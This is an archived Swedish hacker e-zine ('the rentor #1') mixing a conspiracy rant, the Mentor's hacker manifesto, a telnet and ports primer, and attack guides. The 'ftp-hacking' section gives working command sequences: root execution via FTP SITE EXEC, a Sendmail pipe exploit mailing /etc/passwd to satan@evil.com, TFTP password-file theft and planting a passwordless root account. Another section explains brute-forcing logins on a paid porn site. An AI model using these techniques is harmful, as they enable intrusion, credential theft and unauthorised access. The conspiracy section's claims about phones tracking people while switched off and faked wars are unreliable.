OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
* #
* #
* #
____*____ #
/ \ #
/_________\ #
#
/ / | \ \ #
/ / | \ \ #
/ / | \ \ #
#
#
the rentor #1 99 #
#
zap.to/rentor #
rentor64@hotmail.com #
########################################################################
#
#
#1. rentors ord #
#
#2. konspirationen #
#
#3. mentor's last words #
#
#4. telnet #
#
#5. lite portar #
#
#6. ftp-hacking #
#
#7. hur man surfar gratis på en betal-porr sida #
#
#8. länkar #
#
#9. avslutande ord #
#
#
#
########################################################################
#
#
#
#1. rentors ord #
#
#
hej och välkommna till det första numret av "the rentor"!! #
vill ni prenumurera på denna tidning så skicka ett mail till #
rentor64@hotmail.com och skriv prenumurera i subjekt. #
#
kom ihåg att jag inte har ansvar för vad ni gör med informationen #
på denna sida. jag kan inte garantera att alla "hacks" jag tipsar #
om fungerar heller så kom inte och var sura när ni åkt fast. #
#
denna tidning innehåller ju lite mer text än andra zines #
så jag hoppas att ni orkar läsa allt :) #
#
hjälp till att få den här tidningen bättre!!! #
skicka in era tips och texter..sitt inte och håll inne på en massa #
information, så ta armen ur tarmen och skicka allt till mig på #
rentor64@hotmail.com. #
#
jag tar gärna mot allt inom phreaking, cracking, #
hacking..vad som helst!!! #
#
#
tack för mig //rentor #
#
#
########################################################################
#2. konspirationen
1. är konspirationen ett faktum?
2. mobiltelefoner
3. streck-kod
4. kan "de" spåra dig?
1. är konspirationen ett faktum???
#ni som läser detta tror särkert att jag har tittat för mycket på x-files eller nått,
men saken är att x-files var inte först med idén om en konspiration som rör oss alla.
Idén har funnits genom alla tider. Jag menar redan i det gamla antika grekland
fanns det konspirationer, högre män som kontrollerade de vardagliga människorna.
Men jag ska inte prata om grekland, jag ska prata om 1900-talet.#
#först och främst ska jag ger er några råd:
1. tro inte ett skit på det som står i tidningen! Tidningar är till för att
manipulera och lura människor!
2. tror inte på nått du ser på tv!
3. lita inte på någon! Inte ens dig själv!
4. undvik att handla varor som kontrolleras med streck-koder
5. undvik att handla med nått sorts kort! Tex ett ica-kundkort
6. undvik att gå till banken
7. undvik telefon-linan på alla sätt
nu tror ni särkert att jag är galen, men sanningen är att "multimedia" har makten att
manipulera oss totalt!! de kan lura i oss att helt krig pågar tex i afrika, fast det
egentligen inte gör det. Lita inte på någon, det låter kanske lite grymt men berätta
inte personliga saker i onödan till folk som du knappt känner. När jag säger att du
inte ska lita på dig själv så menar jag...vad du ser är inte alltid sant.....
och människan har tyvärr den förmågan att man kan tala om för sig själv att en
lögn är sann tillräckligt många gånger tills den personen själv tror på det.
Unvik att gå till banken så ofta du kan...har hellre pengarna hemma.
De kan kolla exakt var, när och hur du tog ut dina pengar och kan sen spåra vad
du handlade för pengarna genom streck-kods märkta varor. Undvik också telefon
linan så ofta du kan, varenda linje är avlyssnad de kan höra allt du säger och
det är ännu värre med mobiler....jag vägrar personligen att bära omkring en mobil, jag
menar det är ett faktum att det finns ett litet chip i varje mobil som kan spåras
till och med när telefonen är avstängd.#
2. mobil-telefoner
#som jag skrev innan finns det ett chip i varje telefon..och detta är ett faktum!!!!
Ifall du bär omkring på en mobil kan du spåras var du än går!! Chippet fungerar till och
med när telefonen är avstängd. Det är inte konstigt att "de" vill att alla ska ha mobil!!
Desto fler som köper en mobil....desto större koll har de på oss. Så akta er från denna
livsfarliga leksak.#
3. streck-kod
#streck-kod används till ett mer än att hålla ordning på varorna...det är ett utmärkt
sätt att kolla vilka varor som har köpts och var de är köpta. Apparaten som används
för att läsa koden används troligen till mer än att läsa kod. Ett nät av datorer är
troligt och de skriver upp exakt vad som säljs var och när. Utmärkt för bolagen som
vill sälja sina produkter till oss dumma vardagliga människor som inte fattar nånting
......nu kan de placera ut de varor som säljer bäst exakt i en viss affär där den verkar
sälja mycket. Det här är så klart inget nytt men bra att veta.#
4. kan de spårar dig??
#så klart "de" kan!!! De kan i princip spåra dig vad du än gör!!de kan spåra dig:
-när du ringer med en vanlig eller med en mobil-telefon
-när du använder internet
-när du handlar med nått sorts kort
-när du tar ut pengar eller gå till banken
de finns ännu fler tillfällen de kan spåra dig.."de" har särkert mikrifoner
och små kameror överallt. Snart ska vårt land placera ut överbevaknings kamerar på våra
gator också!! Snart kan vi ens röra oss utan att bli iaktagna!!#
DE VILL HA KONTROLL ÖVER OSS OCH DE KOMMER ATT FÅ DE IFALL INTE FOLK BÖRJAR INSE FAKTA!!!
#########################################################################################
#3.mentor's last words
tycker att alla som är intresserade av hacking och dylikt..ska ha läst den här texten.
"Mentor's Last Words"
Another one got caught today, it's all over the papers. "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank
Tampering"... Damn kids. They're all alike. But did you, in your three-
piece psychology and 1950's technobrain, ever take a look behind the
eyes of the hacker? Did you ever wonder what made him tick, what forces
shaped him, what may have molded him? I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the
other kids, this crap they teach us bores me... Damn underachiever.
They're all alike. I'm in junior high or high school. I've listened to
teachers explain for the fifteenth time how to reduce a fraction.
I understand it. "No, Ms. Smith, I didn't show my work. I did it in
my head..." Damn kid. Probably copied it. They're all alike.
I made a discovery today. I found a computer. Wait a second, this is
cool. It does what I want it to. If it makes a mistake, it's because I
screwed it up. Not because it doesn't like me... Or feels threatened by
me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be
here... Damn kid. All he does is play games. They're all alike. And then
it happened... a door opened to a world... rushing through the phone line
like heroin through an addict's veins, an electronic pulse is sent out,
a refuge from the day-to-day incompetencies is sought... a board is found.
"This is it... this is where I belong..." I know everyone here... even
if I've never met them, never talked to them, may never hear from them
again... I know you all... Damn kid. Tying up the phone line again.
They're all alike... You bet your ass we're all alike... we've been
spoon-fed baby food at school when we hungered for steak... the bits of
meat that you did let slip through were pre-chewed and tasteless.
We've been dominated by sadists, or ignored by the apathetic. The few
that had something to teach found us willing pupils, but those few are
like drops of water in the desert.
This is our world now... the world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without
paying for what could be dirt-cheap if it wasn't run by profiteering
gluttons, and you call us criminals. We explore... and you call us
criminals. We seek after knowledge... and you call us criminals. We
exist without skin color, without nationality, without religious bias...
and you call us criminals. You build atomic bombs, you wage wars, you
murder, cheat, and lie to us and try to make us believe it's for our
own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never
forgive me for. I am a hacker, and this is my manifesto. You may stop
this individual,but you can't stop us all... after all, we're all alike.
+++The Mentor+++
[May the members of the phreak community never forget his words -JR]
####################################################################
#4.telnet
telnet
#denna text är tänkt för nybörjare som har windows som opperativsystem#
hm vad är telnet igentligen?
kliar det i huvudet när ni hör hackers säga "jag telnettade dit...."?
telnet är ett underbart verktyg som man kan ansluta till andra datorer med.
i denna text tänker jag lära dig grunderna i telnet och även ge lite tips
om roliga ställen du kan telnetta till.
först och främst ska jag förklara det här med portar. datorer använder portar
för att mata in och ut information, tex ifall du gå in på en website så
det som egentligen händer är att din dator telnettar till port 80 till
den datorn som websiten ligger på. lät det krånligt? en annat exempel är
det underbara verktyget icq, när du chattar med nån så använder datorn också
portar för att hämta och skicka information.
nu ska vi telnetta!!!!!!
gå ut i dos, jag rekomderar att jobba ifrån dos.
skriv telnet sdf.lonestar.org
vad som händer nu är att din dator ansluter sig till datorn sdf.lonestar.org.
den här datorn ger ut shellkonton och det ska vi prata om i nån annan text.
vad du kan göra på den här datorn är att skaffa ett shellkonto, men ifall du
läser den här texten så borde du inte tänka på det :)
som jag sa så går all information genom portar och här följer några vanliga
portar:
21 är ftp porten...den används för att skicka eller hämta information.
23 är telnetporten...standardporten..ifall du bara skriver tex
telnet sdf.lonestar.org så telnettar din dator automatiskt till
just port 23.
79 är den klassiska finger porten. alla onda hackers favorit-port :)
80 är html porten...alltså den port som du använder när du surfar.
ska vi telnetta lite till?? okej!
nu ska vi telnetta till datorn whois.internic.net på port 23
då skriver vi..telnet whois.internic.net....
då kommer vi till en millitärdator som är öppen för allmänheten och låter
en köra ett unix-kommando som kallas för whois.
du kan kolla upp vem som äger en viss server som du är intresserad av, men
vi ska inte gå in på det.
ett verktyg som du borde skaffa dig är en portscanner. med en portscanner
så kan du kolla vilka portar en viss dator har öppna. du kan nog hitta en
bra scanner ifall du söker efter en på någon sökmotor.
så ifall du vill telnetta till någon bestämd port skriver du bara:
telnet "datorn" port.
tex sdf.lonestar.org 79 :)
hoppas att du förstår. har du några frågor så maila mig.
############################################################
#5.lite portar
okej, jag tänker nu gå genom de vanligaste portarna!
21-ftp-porten
23-telnet
25-popmail
79-finger
80-html-porten
det här är ju grund portarna, men det finns tusentals fler, men de skulle
ta alldeles för stor plats att ha med alla, vill ni ha en komplett lista så gå in
på min sida
zap.to/rentor.
#########################################################################
#6. ftp-hacking
FÖRORD
Det här är en informativ text helt och hållet skriven i utbildnings
syfte. Om du läser den här textfilen har du automatiskt gått med på
följande saker:
1) Du kan inte klandera upphovsmannen till texten för någonting.
2) Upphovsmannen kan inte anklagas för att vara delaktig på något
sätt i något juridiskt sammanhang.
3) Personen som tar till sig informationen och använder
informationen för olagligheter kan inte anklaga upphovsmannen,
SweHack's grundare och ansvariga, siten textfilen hittades på
eller utomjordingar för delaktighet eller orsak.
NOTIS
Inga utomjordingar eller djur har skadats i uppkomsten av den här
textfilen förutom: 14,3 miljoner myggor, 2 ekonomer, 11 skatare,
4 studenter, en boa constrictor, en fladdermus, 2 kor, en get,
7 tomtar, ett Telix 33.6 modem, Bill Gates och en mus.
FTP HACKING
Jag har stött på många som säger att dom 'hackar' igenom FTP. Så
eftersom jag redan där får en ond aning frågar jag: hur?
'Först loggar jag in som anonymous, sedan laddar jag ner /etc/passwd
och är den inte skuggad försöker jag knäcka den'. Vid sådana
tillfällen uppskattar jag att informationskanaler som SweHack
skapats. Så för alla er som använder den metoden ska jag förklara
varför den totalt suger och om du någon gång gör något kommer åka
dit så det skriker om det. Så ta ett bloss på cigarretten, drick
en klunk av din favoritalkohol för nu går det undan. Först och
främst ska jag förklara varför ni inte är HELT anonyma (även fast
det kallas anonymous login). Allt beror på, allt som oftast iaf,
/usr/sbin/tcpd - TCP Wrapper. Placeringen kan variera lite, liksom
namnet men funktionen är den samma. Lagra alla IP som kontaktar
maskinens portar. Oftast för att skydda mot Port Scans (mer om det
senare) men också för att se vilka som ((ab)use) använder deras
tjänster. Så redan innan du har gjort något vet dom vem du är.
Betryggande eller hur? Många FTP demoner är inte helt ärliga heller.
Visst dom spårar inte upp din identitet (behövs ju inte eftersom den
redan är loggad igenom din IP) MEN dom loggar vilka filer du DL/UL.
Ouch. Jupp. Så visst lär dom bli konfunderade när någon loggar in
laddar ner /etc/passwd och sedan loggar ut. Men nu varför till
alltihop riktigt SUGER. Vadå finns det mer? Jupp. På alla maskiner
med en root som har mer än en halv hjärna är den passwd som finns i
FTP totalt värdelös. Vadå? Låt mig förklara det så här, den passwd
som ligger i FTP ligger inte i /etc. JOHOOO!! skriker alla som inte
vet vad dom pratar om. NEJ!! Säger alla som vet vad dom pratar om :-).
Den passwd som ligger i FTP ligger i verkligheten i FTP-biblioteket,
vilket i mitt fall är /home/FTP. Alltså det alla FTP-hackers laddar
hem är /home/FTP/etc/passwd. En värdelös kopia av den verkliga
passwd. Varför värdelös? Jo, därför att varken login eller passwd
behöver stämma. Enda orsaken till att passwd ligger i FTP-biblioteket
överhuvudtaget är för att när du kör en ls så ska du se namnen på
filägarna istället för UID numrena. Kul va? Så inte nog med att du
talar om för root på systemet du just vart på att du är en hacker
wannabe, om du SKULLE ta dig in har han bevis som han direkt kan
skicka till din ISP. Dom ISP jag varit på (öhumm) tar inte direkt
lätt på sådana saker. Har du tur får du en varning. Har du otur blir
du portad. Eftersom vi inte har så många ISP's så skulle det inte ta
så lång tid att arbeta sig igenom allihop. Kort karriär med andra ord.
Innan jag glömmer att skriva det ska jag också säga att tcpd OFTAST
lagrar sin information i /var/log/syslog. Oftast. Så sluta med denna
eleet FTP-hacking och gör någonting vettigt istället.
Nu lite annat om FTP. Många root (eller sysadmins eller vafan ni nu
vill kalla dom) glömmer att ändra rättigheterna på FTPd efter att
den blivit installerad. Oftast betyder det att FTPd sitter med root.
Hehehehe. Än sen då? Jo, tänk dig att du har ett kul program som
du vill köra som root (tips, kan du inte tänka ut någonting bra
själv, kolla in Darkmoon aka Gate of Sinners), ladda upp det.
Ja det loggas så döp det till något omisstänksamt som tex index.html.
Nu hör jag massa DOS och Windows fantaster skrika: VA!?! En .HTML fil
går ju inte att köra? Jodå. På *NIX gör den det. Med rätt rättigheter
så. Eftersom du äger filen (behöver inte vara så om du använder
anonymous FTP) kan du ändra rättigheterna till others rwx. Sedan
använder du SITE EXEC /varprogrammet/ligger/Devious. Voila!
Programmet körs som root. Ta bort programmet och ladda upp din riktiga
index.html. Observera att de om de är paranoida har fler loggnings
program, men på det här sättet petar du dom inte i ögona med att det
var DU som laddade upp filen. Men nu till det viktigaste. Hur vet du
om FTPd körs som root? Finns flera sätt men eftersom det är ganska
platformsbaserat tar jag bara upp ett: SITE EXEC /bin/id.
Förstår du inte så ta och läs vidare någon annanstans.
Mer om FTP. Ok. Lite gott & blandat. Kräver oftast en äldre version
av FTPd. Men nu kör vi. Kommandot QUOTE kan användas till att komma
in som root.
ftp -n
open victim.commie.com
quote user ftp
quote cwd ~root
quote pass ftp
Vill ni ha detaljer så leta reda på det engelska orginalet. Fan,
jag bara översätter här.
MAIL
Mail demoner har ofta innehållet buggar av olika sort och Sendmail är
känt för sina. Det finns nästan hur många som helst till äldre
Sendmail - versioner. Men det finns även några stycken för nyare
versioner. En bugg som jag gillar rätt bra, funkar upp till 8.8.8.
Sendmail XXX
Det finns en bugg i Sendmail som låter dig skriva över avsändarens IP.
Enkelt, smärtfritt och helt anonyma (nästan iaf) E-Mails. Buggen är
enkel och går så här.
I vanliga fall skriver man:
HELO My.Faked.Com
MAIL FROM: god
RCPT TO: satan
DATA
.
Men för att använda XXX (du kan använda vilket djävla tecken som helst
jag använder bara X som exempel) skriver du:
HELO XXXXXXXXXX [X > 1024] XXXXXXXXXXXXXXXXXXX
MAIL FROM: god
RCPT TO: satan
DATA
.
Så länge du skriver mer än 1024 X i HELO satsen kommer din avsändar IP
att skrivas över. Viola! MEN. Det här funkar bara på Sendmail och
demoner som bygger på Sendmail, så som vanligt gäller det att veta
vad man sysslar med.
PIPING (näe det står INTE pipping)
Ok. Sista Sendmail buggisen för den här gången.
Trying 128.128.128.1...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail satan@evil.com < /etc/passwd"
250 "|/bin/mail satan@evil.com < /etc/passwd"... Sender ok
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
En gammal favorit i repris skulle man kunna säga. För er som inte
hänger med ska jag (försöka) förklara. När Sendmail ska processa
(okey så jag är engelsk-skadad... Eat me Monkey-Boy) datan
beter den sig rätt klantigt vilket gör att den tolkar datan i
MAIL FROM som en pipe. Vill ni veta vad en pipe är? Skaffa Linux.
'nuff said. Pipen gör att datan exekveras och viola! /etc/passwd
mailas hem till dig. Eller allra helst, till ett Hotmail-konto.
Buggen är fixad i alla versioner efter 8.6.4. Men skit samma, har
nyligen stött på en Sendmail 5.5. :-)
TFTP
Dålig kontroll över TFTP kan leda till att vem som helst kan ladda ner
vilka filer som helst. Ouch.
tftp
connect evil.com
get /etc/passwd
quit
Senare versioner av TFTP har domänrestriktioner (fel domän - ingen fil)
men sådant går att komma runt.
GAMMAL FAVORIT
evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
Please fuck me over all you can!
victim #
Mest underbara med det här är att du hamnar under ett icke-existerande
konto, vilket att det du sedan pysslar med inte syns. Men var
försiktig så att du inte lämnar sekundära spår. Ändrade filer.
Nya filer. Och sådant. Ja ni hänger med.
PARANOIA
Här följer några knep för er som av en eller annan anledning vill
dölja vissa delar av eran HD:s innehåll. Först och främst - kryptering.
Det finns en uppsjö av olika krypterings- program och metoder men för
att vara riktigt paranoid ska du helst ha fler än en kryptering.
Först krypterar du dom filer du vill gömma, sedan använder du en
annan kryptering för att kryptera nyckeln och sedan en tredje
kryptering för att kryptera den nyckeln osv. Lämna gärna en okrypterad
textfil med ledtrådar om vilken ordning du använt krypteringsprogrammen
i. Annars kan det bli jobbigt när du ska okryptera dem i framtiden :-).
Men eftersom vissa filer är onödigt jobbiga att kryptera (bilder som
man ofta tittar på tex) måste vi kunna gömma dom också. Så vad göra?
Ett sätt är att gräva fram en gammal version av DOS. Den behöver
inte vara antik men måste vara lägre än 7 (DOS som följer med Win95).
I någon katalog som heter typ \Spel\Mighty\Data skapar du en katalog
som heter [NULL]*. NULL har ASCII-värde 255 och fås fram igenom att
hålla ner ALT, trycka 255, släppa ALT och Voila! Som alla DOS-fantaster
vet så står * för valfri kombination av tecken. Den här katalogen kan
du nu ENDAST gå ner i med den här äldre versionen av DOS. I windows
kommer du få felmeddelandet "Den här katalogen existerar inte eller är
borttagen" och i Linux får du oxå problem eftersom katalognamnet
innehåller Linux specifika systemtecken. Så nu flyttar du alla krypterade
filer & bilder till denna nu icke-existerande (hehehehe) katalogen
och gömmer dom. I DOS gör man det med 'ATTRIB +H *.*'. Om någon nu
vill läsa dina filer kommer dom få ett helvete i att försöka få tag
på dem. Vet dom inte att filerna finns överhuvudtaget kommer dom nog
inte att hitta dem överhuvudtaget om dom inte kollar igenom HD:n efter
mysko clusters. Gör det på en 1.3 Gb HD frivilligt!!
#####################################################################
#7. hur man surfar gratis på en betal-porr sida!!! :)
//jag skiter ifall ni åker fast...det är inte mitt problem!!!!\\
först och främst vill jag bara säga att jag är inte ett porrfreak som
sitter hela dagarna och surfar porr!!! jag skulle bara testa ifall jag
kunde "bryta" mig in och surfa gratis!!!
så här gör du:
#del 1
gå in på sidan du vill använda....vi tar nu exempel www.pornohound.com.
tryck på members och då kommer det upp en ruta där du ska fylla i login
och password. hitta bara på nått som självklart inte fungerar. gör det tre
gånger och då kommer du till en sida där det kan står tex "forbidden" eller
nått liknande. kolla urlen och kom ihåg den, i detta exemplet var det då
www.pornohound.com/members/main.html.
#del 2
nu kommer det som en del tycker kanske är lite jobbigt...men ett bra sätt är
en "brute force attack". det betyder att du testar dig fram med olika lösenord.
det finns många sätt att göra det, men det bästa är ju självklart att använda
ett program eller skriva ett eget progg. det är klart plus-poäng ifall du skriver
ett eget, men det finns ju ändå en massa program på nätet som gör detta åt dig.
jag rekomenderar www-hack. grejen är att dessa sidor har väldigt dåligt
lösenords-system och de har ofta dubbletter. tex login: paul password: paul.
www-hack kör denna funktion att den använder sig av dubbletter men kan också
använda sig av enskilda passwords. så kör nu progget på den urlen som sidan visade
och det kan ta ungefär en kvart men det brukar funka.
har du några frågor eller kommentarer maila till mig. rentor64@hotmail.com
##########################################################################
#8.länkar
detta är alla länkar för den här gången...vill ni att jag ska länkar er
sida så maila mig på rentor64@hotmail.com
zap.to/rentor------min sida!!
home.swipnet.se/bhunji---sida om cracking mm
upos.cjb.net------svensk phreaking-grupp
##########################################################################
#9.avslutande ord
tack för att ni har läst min tidning och jag hoppas att ni kommer att göra
det igen!! vill ni göra reklam för ert zine, hemsida eller att letar efter folk
som kan någoting om tex hacking..så kan ni sätta in en annons--maila mig!!!
skicka in texter!!!!! så går det fortare tills nästa nummer kommer!!!!
tack som fan
//rentor
##########################################################################